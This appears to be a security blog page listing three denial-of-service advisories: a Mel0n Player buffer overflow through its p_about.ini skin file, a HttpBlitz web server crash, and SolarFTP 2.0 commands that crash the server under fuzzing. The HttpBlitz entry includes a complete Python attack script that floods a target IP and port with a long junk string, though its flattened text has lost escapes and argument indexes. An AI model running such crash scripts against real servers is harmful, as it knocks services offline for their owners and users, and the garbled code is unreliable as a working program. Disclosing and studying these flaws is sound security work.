Mel0nPlayer 1.0.11.x Denial of Service POC
Mel0n Player is a famous software in Indonesia to play songs that are provided by the Melon portal (http://www.melon.co.id). This software can play any music file types such as mp3, wav, wma, mp4, and others. This player can also play the files on your local computer or by online streaming to the portal Melon. The songs can also be downloaded to your local computer.
The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file as part of skin template. This file will bring the program information and can be accessed on the menu (Menu → Information)), as a result of adding extra bytes to parts of the file (Text section), giving the attackers possibility to run an arbitrary code execution on the system that install Melon Player.
This is just the POC, it will just crash the program.. (more…)
HttpBlitz Web Server Denial Of Service Exploit
#!/usr/bin/python # Title: HttpBlitz DOS # Date: 12/24/2010 # Author: otoy # Software Link: http://sourceforge.net/projects/httpblitz/files/HttpBlitz.msi/download # Tested on: Windows XP SP3 # # ====================================================================== # ___ _ __ __ __ _ __ # ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _ # / __ / / __ `/ / __/ __ `/ / / _ / ___/ __ / / __ / __ / __ `/ # / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ / # __,_/_/__, /_/__/__,_/_/ ___/___/_/ /_/_/__,_/_/ /_/__,_/ # /____/ http://www.digital-echidna.org # ====================================================================== # # Greetz: # say hello to all digital-echidna org crew: # modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix # special thx to offsec, exploit-db, corelan team # #### Software description: # A cross platform Http web server developed using C++. Agile methodology # with emphasis on :- 1. Good Design 2. Object Oriented Programming 3. # Refactoring 4. Static/Dynamic Analysis, Unit-testing, Code Coverage 5. # Software Engineering best practices. # #### DOS information: # you just have to send long string, and it will crash the program. # just scan the port using nmap will crash the program too. import socket, sys s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) junk = "x41" * 80000 def banner(): print "nHttpBlitz DOS." print "By: otoy (otoy[at]digital-echidna[dot]org)n" if len(sys.argv)!=3: banner() print "Usage: %s <ip> <port>n" %sys.argv sys.exit(0) try: s.connect((sys.argv, int(sys.argv))) except: print "Can't connect to server!n" sys.exit(0) s.send(junk+'rn') s.close()
SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
SolarFTP Server 2.0 is prone to a denial of service condition. It fails to properly sanitize user-supplied input resulting in a denial of service. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’, and ‘NLST’ command, a remote attacker can potentially disable the FTP service.
Solar FTP Server is a handy and easy to use personal FTP server with features like virtual directories, simple and intuitive user interface, real-time activity monitoring and management.
Testing and Fuzzing
Using Very Simple FTP Fuzzer, we test the FTP server with various commands. The first command that we sent was APPE (append). The Windows exception handler pop out. That was verify that the server may be vulnerable to some commands.
Unfortunately, the junk that we sent did not overwrite the SEH nor the EIP. It just end in Denial of Service. In conclusion, there are 4 commands which make the server crash, APPE, NLST, PUT, and GET.